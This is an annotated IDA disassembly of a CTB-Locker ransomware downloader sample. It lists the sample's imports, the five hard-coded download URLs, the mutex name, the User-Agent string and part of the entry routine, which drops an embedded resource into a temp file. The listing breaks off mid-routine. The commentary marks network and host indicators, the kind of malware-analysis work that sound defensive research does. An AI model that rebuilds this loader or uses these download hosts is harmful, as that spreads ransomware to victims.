.idata:00401000 ;
.idata:00401000 ; +-------------------------------------------------------------------------+
.idata:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.idata:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.idata:00401000 ; | Licensed to: |
.idata:00401000 ; +-------------------------------------------------------------------------+
.idata:00401000 ;
.idata:00401000 ; Input MD5 : 48C9B4DBFB4B163B0ABB03F74E1834B1
.idata:00401000
.idata:00401000 ; File Name : CTB_Locker_download_payload.bin
.idata:00401000 ; Format : Portable executable for 80386 (PE)
.idata:00401000 ; Imagebase : 400000
.idata:00401000 ; Section 1. (virtual address 00001000)
.idata:00401000 ; Virtual size : 00001110 ( 4368.)
.idata:00401000 ; Section size in file : 00001200 ( 4608.)
.idata:00401000 ; Offset to raw data for section: 00000200
.idata:00401000 ; Flags E0000020: Text Executable Readable Writable
.idata:00401000 ; Alignment : default
.idata:00401000 ;
.idata:00401000 ; Imports from KERNEL32.dll
.idata:00401000 ;
.idata:00401000
.idata:00401000 include uni.inc ; see unicode subdir of ida for info on unicode
.idata:00401000
.idata:00401000 .686p
.idata:00401000 .mmx
.idata:00401000 .model flat
.idata:00401000
.idata:00401000 ; ===========================================================================
.idata:00401000
.idata:00401000 ; Segment type: Externs
.idata:00401000 ; _idata
.idata:00401000 ; void __stdcall ExitProcess(UINT uExitCode)
.idata:00401000 ?? ?? ?? ?? extrn ExitProcess:dword ; CODE XREF: start+24Dp
.idata:00401000 ; sub_40197F+3Ep
.idata:00401000 ; DATA XREF: ...
.idata:00401004 ; HRSRC __stdcall FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType)
.idata:00401004 ?? ?? ?? ?? extrn FindResourceA:dword
.idata:00401004 ; CODE XREF: start+BCp
.idata:00401004 ; start+D7p
.idata:00401004 ; DATA XREF: ...
.idata:00401008 ; HGLOBAL __stdcall LoadResource(HMODULE hModule, HRSRC hResInfo)
.idata:00401008 ?? ?? ?? ?? extrn LoadResource:dword
.idata:00401008 ; CODE XREF: start+F2p
.idata:00401008 ; start+FEp
.idata:00401008 ; DATA XREF: ...
.idata:0040100C ; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
.idata:0040100C ?? ?? ?? ?? extrn VirtualFree:dword ; CODE XREF: start+2A0p
.idata:0040100C ; sub_401C0D+199p
.idata:0040100C ; DATA XREF: ...
.idata:00401010 ; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
.idata:00401010 ?? ?? ?? ?? extrn WriteFile:dword ; CODE XREF: start+1A8p
.idata:00401010 ; sub_401DB3+75p
.idata:00401010 ; DATA XREF: ...
.idata:00401014 ; void __stdcall Sleep(DWORD dwMilliseconds)
.idata:00401014 ?? ?? ?? ?? extrn Sleep:dword ; CODE XREF: start+264p
.idata:00401014 ; start+2BCp ...
.idata:00401018 ; DWORD __stdcall SizeofResource(HMODULE hModule, HRSRC hResInfo)
.idata:00401018 ?? ?? ?? ?? extrn SizeofResource:dword
.idata:00401018 ; CODE XREF: start+11Ep
.idata:00401018 ; DATA XREF: start+11Er
.idata:0040101C ; DWORD __stdcall GetModuleFileNameW(HMODULE hModule, LPWCH lpFilename, DWORD nSize)
.idata:0040101C ?? ?? ?? ?? extrn GetModuleFileNameW:dword
.idata:0040101C ; CODE XREF: start+1D0p
.idata:0040101C ; DATA XREF: start+1D0r
.idata:00401020 ; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
.idata:00401020 ?? ?? ?? ?? extrn CreateFileW:dword ; CODE XREF: start+185p
.idata:00401020 ; sub_401DB3+5Bp
.idata:00401020 ; DATA XREF: ...
.idata:00401024 ; int __stdcall lstrlenW(LPCWSTR lpString)
.idata:00401024 ?? ?? ?? ?? extrn lstrlenW:dword ; CODE XREF: sub_401AFC+2Bp
.idata:00401024 ; sub_401C0D+52p ...
.idata:00401028 ; DWORD __stdcall GetTempPathW(DWORD nBufferLength, LPWSTR lpBuffer)
.idata:00401028 ?? ?? ?? ?? extrn GetTempPathW:dword
.idata:00401028 ; CODE XREF: start+12Ep
.idata:00401028 ; DATA XREF: start+12Er
.idata:0040102C ; DWORD __stdcall GetLastError()
.idata:0040102C ?? ?? ?? ?? extrn GetLastError:dword
.idata:0040102C ; CODE XREF: start+23Fp
.idata:0040102C ; DATA XREF: start+23Fr
.idata:00401030 ; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
.idata:00401030 ?? ?? ?? ?? extrn GetProcAddress:dword
.idata:00401030 ; CODE XREF: sub_4019C4+7Bp
.idata:00401030 ; sub_4019C4+88p ...
.idata:00401034 ; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
.idata:00401034 ?? ?? ?? ?? extrn VirtualAlloc:dword
.idata:00401034 ; CODE XREF: start+75p
.idata:00401034 ; start+82p ...
.idata:00401038 ; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
.idata:00401038 ?? ?? ?? ?? extrn LoadLibraryA:dword
.idata:00401038 ; CODE XREF: sub_4019C4+11p
.idata:00401038 ; sub_4019C4+1Ap ...
.idata:0040103C ; LPVOID __stdcall LockResource(HGLOBAL hResData)
.idata:0040103C ?? ?? ?? ?? extrn LockResource:dword
.idata:0040103C ; CODE XREF: start+113p
.idata:0040103C ; DATA XREF: start+113r
.idata:00401040 ; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
.idata:00401040 ?? ?? ?? ?? extrn GetModuleHandleA:dword
.idata:00401040 ; CODE XREF: start+D0p
.idata:00401040 ; start+EBp
.idata:00401040 ; DATA XREF: ...
.idata:00401044 ; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
.idata:00401044 ?? ?? ?? ?? extrn CreateMutexA:dword
.idata:00401044 ; CODE XREF: start+239p
.idata:00401044 ; DATA XREF: start+239r
.idata:00401048 ; BOOL __stdcall CloseHandle(HANDLE hObject)
.idata:00401048 ?? ?? ?? ?? extrn CloseHandle:dword ; CODE XREF: start+1AFp
.idata:00401048 ; sub_401DB3+7Ep
.idata:00401048 ; DATA XREF: ...
.idata:0040104C ; BOOL __stdcall DeleteFileW(LPCWSTR lpFileName)
.idata:0040104C ?? ?? ?? ?? extrn DeleteFileW:dword ; CODE XREF: sub_401DB3+C3p
.idata:0040104C ; DATA XREF: sub_401DB3+C3r
.idata:00401050
.idata:00401054 ;
.idata:00401054 ; Imports from USER32.dll
.idata:00401054 ;
.idata:00401054 ; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
.idata:00401054 ?? ?? ?? ?? extrn MessageBoxA:dword ; CODE XREF: sub_40197F+36p
.idata:00401054 ; DATA XREF: sub_40197F+36r
.idata:00401054
.text:00401058 ; ===========================================================================
.text:00401058 ; Constant data referenced by the code below; it shares the Read/Write/Execute _text segment with the code.
.text:00401058 ; Segment type: Pure code
.text:00401058 ; Segment permissions: Read/Write/Execute
.text:00401058 _text segment para public 'CODE' use32
.text:00401058 assume cs:_text
.text:00401058 ;org 401058h
.text:00401058 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00401058 00 00 00 00 00 00+ align 10h ; next five UTF-16 strings: host/path values whose addresses start stores in its stack table and hands to sub_401C0D one at a time (network indicators)
.text:00401060 aShopOye_itXxxi: ; DATA XREF: start+32o
.text:00401060 73 00 68 00 6F 00+ unicode 0, <shop-oye.it/XXXinstallXXX/abc.tar.gz>,0
.text:004010AA 00 00 align 4
.text:004010AC aAspiroflash_fr: ; DATA XREF: start+39o
.text:004010AC 61 00 73 00 70 00+ unicode 0, <aspiroflash.fr/cai/abc.tar.gz>,0
.text:004010E8 aDieideenwerkst: ; DATA XREF: start+40o
.text:004010E8 64 00 69 00 65 00+ unicode 0, <dieideenwerkstatt.at/css/abc.tar.gz>,0
.text:00401130 aFirststepbaham: ; DATA XREF: start+47o
.text:00401130 66 00 69 00 72 00+ unicode 0, <firststepbahamas.com/PDF/abc.tar.gz>,0
.text:00401178 aWymianaWsb_cba: ; DATA XREF: start+4Eo
.text:00401178 77 00 79 00 6D 00+ unicode 0, <wymiana-wsb.cba.pl/pp/abc.tar.gz>,0
.text:004011BA 00 00 align 4
.text:004011BC 70 6F 6B 6A 75 73+aPokjuszo db 'pokjuszo',0 ; DATA XREF: start+16o -- start copies these 9 bytes to its Name buffer and passes that buffer to CreateMutexA (host indicator)
.text:004011C5 00 00 00 align 4
.text:004011C8 ; char Type[]
.text:004011C8 44 41 54 41 00 Type db 'DATA',0 ; DATA XREF: start+AFo -- resource type string given to FindResourceA
.text:004011C8 ; start+C5o
.text:004011CD 00 00 00 align 10h
.text:004011D0 aSS: ; DATA XREF: start+155o
.text:004011D0 ; sub_401DB3+2Eo
.text:004011D0 25 00 73 00 25 00+ unicode 0, <%s%s>,0 ; in start: joins the temp directory and the random file name
.text:004011DA 00 00 align 4
.text:004011DC aAeoiuy_: ; DATA XREF: sub_4017BB+Co -- vowel set; the '.' at index 6 is used as the name/extension separator
.text:004011DC 61 00 65 00 6F 00+ unicode 0, <aeoiuy.>,0
.text:004011EC aQwrtpsdfghjklz: ; DATA XREF: sub_4017BB+24o -- consonant set (20 characters)
.text:004011EC 71 00 77 00 72 00+ unicode 0, <qwrtpsdfghjklzxcvbnm>,0
.text:00401216 00 00 align 4
.text:00401218 aTxtrtfdocchmhl: ; DATA XREF: sub_4017BB+37o -- 37 three-character extensions packed back to back; "exe" starts at character offset 69h, "dll" is last
.text:00401218 74 00 78 00 74 00+ unicode 0, <txtrtfdocchmhlpttfpdffb2xlspptmdbcdawavwmamp3avimpgmdvflv>
.text:00401218 72 00 74 00 66 00+ unicode 0, <swfwmvvobbmpgifjpgpngisomdfmdsbindatnrg3gpoggvobexedll>,0
.text:004012F8 45 72 72 6F 72 20+aErrorCodeD db 'Error code #%d',0 ; DATA XREF: sub_40197F+12o
.text:00401307 00 align 4
.text:00401308 ; char Caption[]
.text:00401308 45 72 72 6F 72 00 Caption db 'Error',0 ; DATA XREF: sub_40197F+28o
.text:0040130E 00 00 align 10h ; DLL and export names below are all referenced from sub_4019C4 (not in this view), which also references LoadLibraryA/GetProcAddress. Presumably run-time import resolution: the import table itself lists only KERNEL32 and USER32. Confirm in sub_4019C4.
.text:00401310 ; char LibFileName[]
.text:00401310 53 48 4C 57 41 50+LibFileName db 'SHLWAPI.DLL',0 ; DATA XREF: sub_4019C4+Co
.text:0040131C ; char aSetupapi_dll[]
.text:0040131C 53 45 54 55 50 41+aSetupapi_dll db 'SETUPAPI.DLL',0 ; DATA XREF: sub_4019C4+13o
.text:00401329 00 00 00 align 4
.text:0040132C ; char aShell32_dll[]
.text:0040132C 53 48 45 4C 4C 33+aShell32_dll db 'SHELL32.DLL',0 ; DATA XREF: sub_4019C4+1Co
.text:00401338 ; char aWinhttp_dll[]
.text:00401338 57 49 4E 48 54 54+aWinhttp_dll db 'WINHTTP.DLL',0 ; DATA XREF: sub_4019C4+25o
.text:00401344 ; char aAdvapi32_dll[]
.text:00401344 41 44 56 41 50 49+aAdvapi32_dll db 'ADVAPI32.DLL',0 ; DATA XREF: sub_4019C4+30o
.text:00401351 00 00 00 align 4
.text:00401354 ; char ProcName[]
.text:00401354 77 6E 73 70 72 69+ProcName db 'wnsprintfA',0 ; DATA XREF: sub_4019C4+75o
.text:0040135F 00 align 10h
.text:00401360 ; char aWnsprintfw[]
.text:00401360 77 6E 73 70 72 69+aWnsprintfw db 'wnsprintfW',0 ; DATA XREF: sub_4019C4+7Do
.text:0040136B 00 align 4
.text:0040136C ; char aSetupiterateca[]
.text:0040136C 53 65 74 75 70 49+aSetupiterateca db 'SetupIterateCabinetW',0
.text:0040136C 74 65 72 61 74 65+ ; DATA XREF: sub_4019C4+8Ao
.text:00401381 00 00 00 align 4
.text:00401384 ; char aShellexecutew[]
.text:00401384 53 68 65 6C 6C 45+aShellexecutew db 'ShellExecuteW',0 ; DATA XREF: sub_4019C4+97o
.text:00401392 00 00 align 4
.text:00401394 ; char aStrstriw[]
.text:00401394 53 74 72 53 74 72+aStrstriw db 'StrStrIW',0 ; DATA XREF: sub_4019C4+A7o
.text:0040139D 00 00 00 align 10h
.text:004013A0 ; char aSystemfunction[]
.text:004013A0 53 79 73 74 65 6D+aSystemfunction db 'SystemFunction036',0 ; NOTE(review): ADVAPI32 export name of RtlGenRandom
.text:004013A0 46 75 6E 63 74 69+ ; DATA XREF: sub_4019C4+B4o
.text:004013B2 00 00 align 4
.text:004013B4 ; char aWinhttpqueryda[]
.text:004013B4 57 69 6E 48 74 74+aWinhttpqueryda db 'WinHttpQueryDataAvailable',0
.text:004013B4 70 51 75 65 72 79+ ; DATA XREF: sub_4019C4+C4o
.text:004013CE 00 00 align 10h
.text:004013D0 ; char aWinhttpreceive[]
.text:004013D0 57 69 6E 48 74 74+aWinhttpreceive db 'WinHttpReceiveResponse',0
.text:004013D0 70 52 65 63 65 69+ ; DATA XREF: sub_4019C4+D1o
.text:004013E7 00 align 4
.text:004013E8 ; char aWinhttpsendreq[]
.text:004013E8 57 69 6E 48 74 74+aWinhttpsendreq db 'WinHttpSendRequest',0
.text:004013E8 70 53 65 6E 64 52+ ; DATA XREF: sub_4019C4+DEo
.text:004013FB 00 align 4
.text:004013FC ; char aWinhttpsetopti[]
.text:004013FC 57 69 6E 48 74 74+aWinhttpsetopti db 'WinHttpSetOption',0 ; DATA XREF: sub_4019C4+EBo
.text:0040140D 00 00 00 align 10h
.text:00401410 ; char aWinhttpopenreq[]
.text:00401410 57 69 6E 48 74 74+aWinhttpopenreq db 'WinHttpOpenRequest',0
.text:00401410 70 4F 70 65 6E 52+ ; DATA XREF: sub_4019C4+F8o
.text:00401423 00 align 4
.text:00401424 ; char aWinhttpconnect[]
.text:00401424 57 69 6E 48 74 74+aWinhttpconnect db 'WinHttpConnect',0 ; DATA XREF: sub_4019C4+105o
.text:00401433 00 align 4
.text:00401434 ; char aWinhttpopen[]
.text:00401434 57 69 6E 48 74 74+aWinhttpopen db 'WinHttpOpen',0 ; DATA XREF: sub_4019C4+112o
.text:00401440 ; char aWinhttpreaddat[]
.text:00401440 57 69 6E 48 74 74+aWinhttpreaddat db 'WinHttpReadData',0 ; DATA XREF: sub_4019C4+11Fo
.text:00401450 aSS_S: ; DATA XREF: sub_401AFC+87o
.text:00401450 25 00 73 00 25 00+ unicode 0, <%s%s.%s>,0
.text:00401460 aS: ; DATA XREF: sub_401AFC+A2o
.text:00401460 ; sub_401C0D+1Bo
.text:00401460 25 00 73 00 00 00 unicode 0, <%s>,0
.text:00401466 00 00 align 4
.text:00401468 asc_401468: ; DATA XREF: sub_401C0D+Co
.text:00401468 2F 00 00 00 unicode 0, </>,0
.text:0040146C 00 00 00 00 align 10h
.text:00401470 aMozilla4_0Comp: ; DATA XREF: sub_401C0D+69o -- fixed User-Agent string referenced by the download routine (network indicator)
.text:00401470 4D 00 6F 00 7A 00+ unicode 0, <Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)>,0
.text:004014D6 00 00 align 4
.text:004014D8 aGet: ; DATA XREF: sub_401C0D+B6o -- HTTP verb string referenced by the download routine
.text:004014D8 47 00 45 00 54 00+ unicode 0, <GET>,0
.text:004014E0
.text:004014E0 ; =============== S U B R O U T I N E =======================================
.text:004014E0 ; start: process entry point. Writes resource 3E9h/"DATA" to a random-named file in the GetTempPathW directory, passes it to two run-time-resolved calls, takes a named mutex, sleeps, then polls five hard-coded host/path strings until sub_4018C7 accepts a returned buffer.
.text:004014E0 ; Attributes: noreturn bp-based frame
.text:004014E0 ; Failure paths push a code 3E8h..3EEh and jump to loc_4015C4 -> sub_40197F (body not in this view; its XREFs are "Error code #%d", MessageBoxA and ExitProcess).
.text:004014E0 ; int __cdecl start(HMODULE hModule)
.text:004014E0 public start
.text:004014E0 start proc near
.text:004014E0 ; NOTE: IDA reuses names here. "lpBuffer" is both a global at 401ED8h (written as "mov lpBuffer, eax") and the local [ebp-8]; the local "dwMilliseconds" [ebp-4] first holds the resource size and later the retry delay.
.text:004014E0 Filename = word ptr -0A4Ch
.text:004014E0 FileName = word ptr -64Ch
.text:004014E0 var_24C = byte ptr -24Ch
.text:004014E0 Name = byte ptr -44h ; receives the 9-byte mutex name copied from aPokjuszo
.text:004014E0 lpString = dword ptr -38h ; first slot of a 5-entry table of {dword string pointer, word character count}, 8 bytes per entry (lpString/var_34 ... var_18/var_14)
.text:004014E0 var_34 = word ptr -34h
.text:004014E0 var_30 = dword ptr -30h
.text:004014E0 var_2C = word ptr -2Ch
.text:004014E0 var_28 = dword ptr -28h
.text:004014E0 var_24 = word ptr -24h
.text:004014E0 var_20 = dword ptr -20h
.text:004014E0 var_1C = word ptr -1Ch
.text:004014E0 var_18 = dword ptr -18h
.text:004014E0 var_14 = word ptr -14h
.text:004014E0 NumberOfBytesWritten= dword ptr -10h
.text:004014E0 var_C = dword ptr -0Ch
.text:004014E0 lpBuffer = dword ptr -8
.text:004014E0 dwMilliseconds = dword ptr -4
.text:004014E0 hModule = dword ptr 8
.text:004014E0 ; dword_401EFC / dword_401EF0 / dword_401EDC are called through pointers with no static target in this view; sub_4019C4 presumably fills them (its XREFs name LoadLibraryA/GetProcAddress) - confirm there.
.text:004014E0 55 push ebp
.text:004014E1 8B EC mov ebp, esp
.text:004014E3 81 EC 4C 0A 00 00 sub esp, 0A4Ch
.text:004014E9 53 push ebx
.text:004014EA 56 push esi
.text:004014EB 57 push edi
.text:004014EC 6A 24 push 24h
.text:004014EE 58 pop eax
.text:004014EF 6A 1D push 1Dh
.text:004014F1 66 89 45 CC mov [ebp+var_34], ax ; table[0] count = 24h, the character length of the first host/path string
.text:004014F5 58 pop eax
.text:004014F6 BE BC 11 40 00 mov esi, offset aPokjuszo ; "pokjuszo"
.text:004014FB 8D 7D BC lea edi, [ebp+Name]
.text:004014FE A5 movsd ; copy name bytes 0..3 (interleaved with the table setup)
.text:004014FF 6A 23 push 23h
.text:00401501 66 89 45 D4 mov [ebp+var_2C], ax ; table[1] count = 1Dh
.text:00401505 58 pop eax
.text:00401506 A5 movsd ; copy name bytes 4..7
.text:00401507 66 89 45 DC mov [ebp+var_24], ax ; table[2] count = 23h
.text:0040150B 66 89 45 E4 mov [ebp+var_1C], ax ; table[3] count = 23h
.text:0040150F 6A 20 push 20h
.text:00401511 58 pop eax
.text:00401512 C7 45 C8 60 10 40+ mov [ebp+lpString], offset aShopOye_itXxxi ; "shop-oye.it/XXXinstallXXX/abc.tar.gz"
.text:00401519 C7 45 D0 AC 10 40+ mov [ebp+var_30], offset aAspiroflash_fr ; "aspiroflash.fr/cai/abc.tar.gz"
.text:00401520 C7 45 D8 E8 10 40+ mov [ebp+var_28], offset aDieideenwerkst ; "dieideenwerkstatt.at/css/abc.tar.gz"
.text:00401527 C7 45 E0 30 11 40+ mov [ebp+var_20], offset aFirststepbaham ; "firststepbahamas.com/PDF/abc.tar.gz"
.text:0040152E C7 45 E8 78 11 40+ mov [ebp+var_18], offset aWymianaWsb_cba ; "wymiana-wsb.cba.pl/pp/abc.tar.gz"
.text:00401535 66 89 45 EC mov [ebp+var_14], ax ; table[4] count = 20h
.text:00401539 A4 movsb ; copy the ninth name byte (NUL terminator)
.text:0040153A E8 85 04 00 00 call sub_4019C4 ; body not in this view; presumably loads the extra DLLs and resolves the function pointers used below - confirm
.text:0040153F 8B 35 34 10 40 00 mov esi, VirtualAlloc
.text:00401545 6A 04 push 4 ; flProtect = 4 (PAGE_READWRITE)
.text:00401547 BF 00 10 00 00 mov edi, 1000h ; 1000h = MEM_COMMIT, reused for every allocation below
.text:0040154C 57 push edi ; flAllocationType
.text:0040154D BB 00 02 00 00 mov ebx, 200h ; requested size of the first three allocations
.text:00401552 53 push ebx ; dwSize
.text:00401553 6A 00 push 0 ; lpAddress
.text:00401555 FF D6 call esi ; VirtualAlloc
.text:00401557 6A 04 push 4 ; flProtect
.text:00401559 57 push edi ; flAllocationType
.text:0040155A 53 push ebx ; dwSize
.text:0040155B 6A 00 push 0 ; lpAddress
.text:0040155D A3 F8 1E 40 00 mov dword_401EF8, eax ; global = 1st allocation (none of the VirtualAlloc results is checked for NULL)
.text:00401562 FF D6 call esi ; VirtualAlloc
.text:00401564 6A 04 push 4 ; flProtect
.text:00401566 57 push edi ; flAllocationType
.text:00401567 53 push ebx ; dwSize
.text:00401568 6A 00 push 0 ; lpAddress
.text:0040156A A3 D8 1E 40 00 mov lpBuffer, eax ; GLOBAL lpBuffer (401ED8h) = 2nd allocation; used below as the GetTempPathW output buffer
.text:0040156F FF D6 call esi ; VirtualAlloc
.text:00401571 6A 04 push 4 ; flProtect
.text:00401573 57 push edi ; flAllocationType
.text:00401574 6A 0C push 0Ch ; dwSize
.text:00401576 6A 00 push 0 ; lpAddress
.text:00401578 A3 EC 1E 40 00 mov dword_401EEC, eax ; global = 3rd allocation; later passed as the third argument of dword_401EDC
.text:0040157D FF D6 call esi ; VirtualAlloc (4th, 0Ch bytes; the returned pointer is not stored in this function)
.text:0040157F 6A 04 push 4 ; flProtect
.text:00401581 57 push edi ; flAllocationType
.text:00401582 6A 10 push 10h ; dwSize
.text:00401584 33 FF xor edi, edi ; edi = 0 from here on: used as NULL / 0 argument and as the comparison value
.text:00401586 57 push edi ; lpAddress
.text:00401587 FF D6 call esi ; VirtualAlloc (5th, 10h bytes; the returned pointer is not stored in this function)
.text:00401589 8B 35 04 10 40 00 mov esi, FindResourceA
.text:0040158F 68 C8 11 40 00 push offset Type ; "DATA"
.text:00401594 68 E9 03 00 00 push 3E9h ; lpName = integer resource ID 3E9h
.text:00401599 FF 75 08 push [ebp+hModule] ; hModule
.text:0040159C FF D6 call esi ; FindResourceA
.text:0040159E 89 45 F8 mov [ebp+lpBuffer], eax ; local lpBuffer = hResInfo from the first lookup
.text:004015A1 3B C7 cmp eax, edi
.text:004015A3 75 35 jnz short loc_4015DA ; found via the hModule argument
.text:004015A5 68 C8 11 40 00 push offset Type ; "DATA"
.text:004015AA 68 E9 03 00 00 push 3E9h ; lpName
.text:004015AF 57 push edi ; lpModuleName = NULL: retry the lookup against the handle GetModuleHandleA(NULL) returns
.text:004015B0 FF 15 40 10 40 00 call GetModuleHandleA
.text:004015B6 50 push eax ; hModule
.text:004015B7 FF D6 call esi ; FindResourceA
.text:004015B9 8B F0 mov esi, eax ; esi = hResInfo (kept for SizeofResource)
.text:004015BB 3B F7 cmp esi, edi
.text:004015BD 75 0A jnz short loc_4015C9
.text:004015BF 68 E8 03 00 00 push 3E8h ; error code 3E8h: resource not found in either lookup
.text:004015C4
.text:004015C4 loc_4015C4: ; CODE XREF: start+110j
.text:004015C4 ; start+197j ...
.text:004015C4 E8 B6 03 00 00 call sub_40197F ; shared error exit; argument = code pushed by the jumping site. IDA shows no fall-through after this call.
.text:004015C9 ; ---------------------------------------------------------------------------
.text:004015C9
.text:004015C9 loc_4015C9: ; CODE XREF: start+DDj
.text:004015C9 56 push esi ; hResInfo
.text:004015CA 57 push edi ; lpModuleName
.text:004015CB FF 15 40 10 40 00 call GetModuleHandleA
.text:004015D1 50 push eax ; hModule
.text:004015D2 FF 15 08 10 40 00 call LoadResource
.text:004015D8 EB 0D jmp short loc_4015E7
.text:004015DA ; ---------------------------------------------------------------------------
.text:004015DA
.text:004015DA loc_4015DA: ; CODE XREF: start+C3j
.text:004015DA 50 push eax ; hResInfo
.text:004015DB FF 75 08 push [ebp+hModule] ; hModule
.text:004015DE FF 15 08 10 40 00 call LoadResource
.text:004015E4 8B 75 F8 mov esi, [ebp+lpBuffer] ; esi = hResInfo saved in the local, so both paths reach loc_4015E7 with esi = hResInfo
.text:004015E7
.text:004015E7 loc_4015E7: ; CODE XREF: start+F8j
.text:004015E7 3B C7 cmp eax, edi
.text:004015E9 75 07 jnz short loc_4015F2
.text:004015EB 68 E9 03 00 00 push 3E9h ; error code 3E9h: LoadResource returned NULL
.text:004015F0 EB D2 jmp short loc_4015C4
.text:004015F2 ; ---------------------------------------------------------------------------
.text:004015F2
.text:004015F2 loc_4015F2: ; CODE XREF: start+109j
.text:004015F2 50 push eax ; hResData
.text:004015F3 FF 15 3C 10 40 00 call LockResource
.text:004015F9 56 push esi ; hResInfo
.text:004015FA 57 push edi ; hModule = NULL
.text:004015FB 89 45 F8 mov [ebp+lpBuffer], eax ; local lpBuffer = pointer to the resource bytes (LockResource result, not NULL-checked)
.text:004015FE FF 15 18 10 40 00 call SizeofResource
.text:00401604 FF 35 D8 1E 40 00 push lpBuffer ; lpBuffer (the GLOBAL buffer at 401ED8h)
.text:0040160A 89 45 FC mov [ebp+dwMilliseconds], eax ; local slot holds the resource size in bytes at this stage
.text:0040160D 53 push ebx ; nBufferLength = 200h (GetTempPathW counts characters; the buffer was requested as 200h bytes)
.text:0040160E FF 15 28 10 40 00 call GetTempPathW
.text:00401614 57 push edi ; sub_4017BB arg_8 = 0: random extension from the table
.text:00401615 8D 85 B4 FD FF FF lea eax, [ebp+var_24C]
.text:0040161B 6A 09 push 9 ; sub_4017BB arg_4 = 9: at most nine letters before the dot
.text:0040161D 50 push eax ; sub_4017BB arg_0 = var_24C, receives the random file name
.text:0040161E E8 98 01 00 00 call sub_4017BB
.text:00401623 8D 85 B4 FD FF FF lea eax, [ebp+var_24C]
.text:00401629 50 push eax
.text:0040162A FF 35 D8 1E 40 00 push lpBuffer
.text:00401630 BB FF 00 00 00 mov ebx, 0FFh ; 0FFh = character limit, reused for GetModuleFileNameW below
.text:00401635 68 D0 11 40 00 push offset aSS ; "%s%s"
.text:0040163A 8D 85 B4 F9 FF FF lea eax, [ebp+FileName]
.text:00401640 53 push ebx
.text:00401641 50 push eax
.text:00401642 FF 15 FC 1E 40 00 call dword_401EFC ; FileName = temp directory + random name; (buffer, limit, format, ...) shape, presumably wnsprintfW - confirm in sub_4019C4
.text:00401648 83 C4 20 add esp, 20h ; removes the 3 sub_4017BB arguments and the 5 arguments of this call
.text:0040164B 57 push edi ; hTemplateFile
.text:0040164C 68 80 00 00 00 push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
.text:00401651 6A 02 push 2 ; dwCreationDisposition = CREATE_ALWAYS
.text:00401653 57 push edi ; lpSecurityAttributes
.text:00401654 6A 01 push 1 ; dwShareMode = FILE_SHARE_READ
.text:00401656 68 00 00 00 40 push 40000000h ; dwDesiredAccess = GENERIC_WRITE
.text:0040165B 8D 85 B4 F9 FF FF lea eax, [ebp+FileName]
.text:00401661 50 push eax ; lpFileName
.text:00401662 89 7D F0 mov [ebp+NumberOfBytesWritten], edi
.text:00401665 FF 15 20 10 40 00 call CreateFileW
.text:0040166B 8B F0 mov esi, eax
.text:0040166D 83 FE FF cmp esi, 0FFFFFFFFh ; INVALID_HANDLE_VALUE
.text:00401670 75 0A jnz short loc_40167C
.text:00401672 68 EA 03 00 00 push 3EAh ; error code 3EAh: could not create the temp file
.text:00401677 E9 48 FF FF FF jmp loc_4015C4
.text:0040167C ; ---------------------------------------------------------------------------
.text:0040167C
.text:0040167C loc_40167C: ; CODE XREF: start+190j
.text:0040167C 57 push edi ; lpOverlapped
.text:0040167D 8D 45 F0 lea eax, [ebp+NumberOfBytesWritten]
.text:00401680 50 push eax ; lpNumberOfBytesWritten
.text:00401681 FF 75 FC push [ebp+dwMilliseconds] ; nNumberOfBytesToWrite = resource size
.text:00401684 FF 75 F8 push [ebp+lpBuffer] ; lpBuffer = resource bytes (local)
.text:00401687 56 push esi ; hFile
.text:00401688 FF 15 10 10 40 00 call WriteFile
.text:0040168E 56 push esi ; hObject
.text:0040168F FF 15 48 10 40 00 call CloseHandle
.text:00401695 8B 45 FC mov eax, [ebp+dwMilliseconds]
.text:00401698 39 45 F0 cmp [ebp+NumberOfBytesWritten], eax ; success is judged by byte count, not by WriteFile's return value
.text:0040169B 74 0A jz short loc_4016A7
.text:0040169D 68 EB 03 00 00 push 3EBh ; error code 3EBh: short or failed write
.text:004016A2 E9 1D FF FF FF jmp loc_4015C4
.text:004016A7 ; ---------------------------------------------------------------------------
.text:004016A7
.text:004016A7 loc_4016A7: ; CODE XREF: start+1BBj
.text:004016A7 53 push ebx ; nSize = 0FFh
.text:004016A8 8D 85 B4 F5 FF FF lea eax, [ebp+Filename]
.text:004016AE 50 push eax ; lpFilename
.text:004016AF 57 push edi ; hModule = NULL: path of the running executable
.text:004016B0 FF 15 1C 10 40 00 call GetModuleFileNameW
.text:004016B6 3B C7 cmp eax, edi
.text:004016B8 75 0A jnz short loc_4016C4
.text:004016BA 68 EC 03 00 00 push 3ECh ; error code 3ECh: GetModuleFileNameW returned 0
.text:004016BF E9 00 FF FF FF jmp loc_4015C4
.text:004016C4 ; ---------------------------------------------------------------------------
.text:004016C4
.text:004016C4 loc_4016C4: ; CODE XREF: start+1D8j
.text:004016C4 8B C8 mov ecx, eax ; ecx = length returned by GetModuleFileNameW
.text:004016C6 8D 85 B4 F5 FF FF lea eax, [ebp+Filename]
.text:004016CC E8 E6 04 00 00 call sub_401BB7 ; register arguments eax = own path, ecx = its length; body not in this view, purpose unknown from here
.text:004016D1 85 C0 test eax, eax
.text:004016D3 75 0A jnz short loc_4016DF
.text:004016D5 68 ED 03 00 00 push 3EDh ; error code 3EDh: sub_401BB7 returned 0
